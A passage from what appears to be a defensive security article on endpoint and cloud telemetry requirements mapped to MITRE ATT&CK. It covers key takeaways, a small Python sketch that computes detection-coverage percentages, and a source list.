No — and understanding the differences is increasingly important as infrastructure shifts toward cloud-native deployment models. Cloud virtual machines can run traditional EDR agents and Sysmon-equivalent tooling, but they require agent deployment baked into machine images to handle auto-scaling and ephemeral instance lifecycles. The larger gap is that many high-frequency ATT&CK techniques in cloud environments — particularly under the Valid Accounts (T1078) and Cloud Infrastructure Discovery (T1580) families — produce signals in cloud identity and API audit logs (AWS CloudTrail, Azure Audit Logs, GCP Cloud Audit Logs) rather than on the endpoint itself. These are fundamentally different telemetry streams that must be collected and correlated alongside endpoint data.

Containers present the hardest instrumentation challenge: a container shares the host kernel but does not support agent-based telemetry collection inside the container image without unacceptable overhead. eBPF-based sensors at the host kernel level have become the dominant solution, observing container process activity, network connections, and syscalls without requiring per-container agents. ATT&CK for Containers, maintained as part of the broader ATT&CK Enterprise matrix, maps techniques like T1610 (Deploy Container) and T1611 (Escape to Host) to telemetry sources including container orchestration audit logs and host-level behavioral telemetry — providing a structured starting point for defenders building detection coverage in containerized environments.

Key Takeaways

  1. ATT&CK is also a sensor requirements document — and now a detection engineering document. Every technique entry includes data source mappings prescribing what telemetry must be operational to detect that technique. The ATT&CK v18 release (October 2025) went further, replacing vague detection notes with structured Detection Strategies and over 1,700 Analytics that explicitly link telemetry components to actionable detection logic. Using ATT&CK only as a threat catalog now leaves two of its most operationally useful dimensions unused.
  2. Telemetry configuration matters as much as telemetry collection. PowerShell Script Block Logging, process command-line argument auditing, and Sysmon Event ID coverage for process access and process tampering are commonly unconfigured in enterprise deployments, creating blind spots for some of the highest-frequency ATT&CK techniques.
  3. Server telemetry is not optional. Domain controllers, file servers, and database hosts are where post-compromise activity concentrates. ATT&CK coverage gaps on these systems represent the most operationally consequential instrumentation failures in most enterprise security programs.
  4. The SIEM alone cannot do it. EDR and SIEM serve different functions in the telemetry pipeline. EDR provides real-time behavioral analysis on the host. SIEM provides cross-source correlation across extended time windows. Both are required for coverage of the full ATT&CK matrix.
  5. Threat hunting closes the gap that automation cannot. Behavioral detections catch known patterns. Hunting interrogates telemetry for patterns not yet encoded in rules. ATT&CK technique hypotheses give hunters a structured starting point grounded in real adversary behavior rather than intuition alone.
  6. Retention and infrastructure model are telemetry decisions, not storage decisions. Detecting adversary dwell time of weeks or months requires telemetry retained long enough to contain the initial intrusion. Cloud and containerized workloads require architecture-specific instrumentation — eBPF at the host kernel for containers, cloud API audit logs alongside endpoint agents for cloud VMs — because the telemetry surfaces differ fundamentally from traditional endpoints. ATT&CK coverage in hybrid environments is only as complete as the narrowest instrumented tier.
  7. ATT&CK coverage percentages measure detection logic, not adversary detectability. Sophisticated adversaries adapt to known defensive tooling — using indirect syscalls to bypass Sysmon hooks, LOLBins to avoid hash-based detections, and targeting the telemetry infrastructure itself through T1562.001. A detection engineering program that treats ATT&CK coverage as the goal rather than a measurement instrument will be outpaced by adversaries who study the same framework. The coverage percentage is useful for identifying gaps; closing those gaps requires detection logic designed to be resilient to active evasion, not just technique presence.
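The measurement caveat in the last takeaway is easy to see in code. The sketch below computes a coverage percentage from a rule inventory; the technique IDs are real ATT&CK identifiers, but the inventory and rule names are invented for illustration. The metric counts techniques with any detection logic at all, which is exactly why it measures gaps rather than detectability.

```python
# Hypothetical inventory: ATT&CK technique ID -> detection rules,
# each tagged with the telemetry source it depends on.
rule_inventory = {
    "T1059.001": [{"rule": "ps_scriptblock_keywords", "telemetry": "scriptblock_log"}],
    "T1055":     [],  # Process Injection: no detection logic at all
    "T1562.001": [{"rule": "sysmon_service_stop", "telemetry": "sysmon"}],
    "T1078":     [{"rule": "anomalous_login_geo", "telemetry": "auth_logs"}],
}

def coverage(inventory):
    """Fraction of tracked techniques with at least one detection rule."""
    covered = sum(1 for rules in inventory.values() if rules)
    return covered / len(inventory)

print(f"coverage: {coverage(rule_inventory):.0%}")  # prints "coverage: 75%"
```

Note what the number hides: the T1562.001 entry counts as "covered" even though its only rule depends on Sysmon telemetry, and T1562.001 is precisely the technique adversaries use to disable that telemetry. A single fragile rule and a layered, evasion-resilient detection contribute identically to the percentage.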

The relationship between endpoint telemetry and MITRE ATT&CK is not incidental. It reflects a fundamental property of the operating environment: adversaries must interact with the operating system to accomplish their objectives, and those interactions produce observable artifacts. The framework's value to defenders is precisely that it translates observed adversary behavior into a structured map of detectable signals. Organizations that build their telemetry infrastructure around that map — rather than treating telemetry collection as a generic compliance requirement — are the ones positioned to find intrusions in hours rather than months.

Sources

  1. MITRE Corporation. "MITRE ATT&CK: Design and Philosophy." Version 1.0. attack.mitre.org
  2. MITRE ATT&CK. "Enterprise Matrix v18." October 2025. attack.mitre.org/matrices/enterprise
  3. MITRE ATT&CK. "ATT&CK v18 Release Notes." October 2025. attack.mitre.org/resources/updates
  4. Robertson, Amy L. "ATT&CK v18: The Detection Overhaul You've Been Waiting For." MITRE ATT&CK Blog, October 2025. medium.com/mitre-attack
  5. MITRE ATT&CK. "Data Sources." attack.mitre.org/datasources
  6. Microsoft Sysinternals. "Sysmon v15 Event Reference." learn.microsoft.com
  7. Microsoft. "Native Sysmon Functionality Coming to Windows." Windows IT Pro Blog, November 2025. techcommunity.microsoft.com
  8. CardinalOps. "Fifth Annual State of SIEM Detection Risk Report." June 2025. cardinalops.com
  9. MITRE ATT&CK Evaluations. "Enterprise Evaluations 2024 (Ransomware / DPRK macOS)." December 2024. attackevals.mitre.org/enterprise
  10. SigmaHQ. "Sigma Rules Repository." GitHub. github.com/SigmaHQ/sigma
  11. Splunk Security Research. "PEAK Threat Hunting Framework." 2023. splunk.com
  12. Microsoft. "Configure Advanced Audit Policy." Windows Security Event ID Reference. learn.microsoft.com
  13. Elastic. "Detection Rules Repository." GitHub. github.com/elastic/detection-rules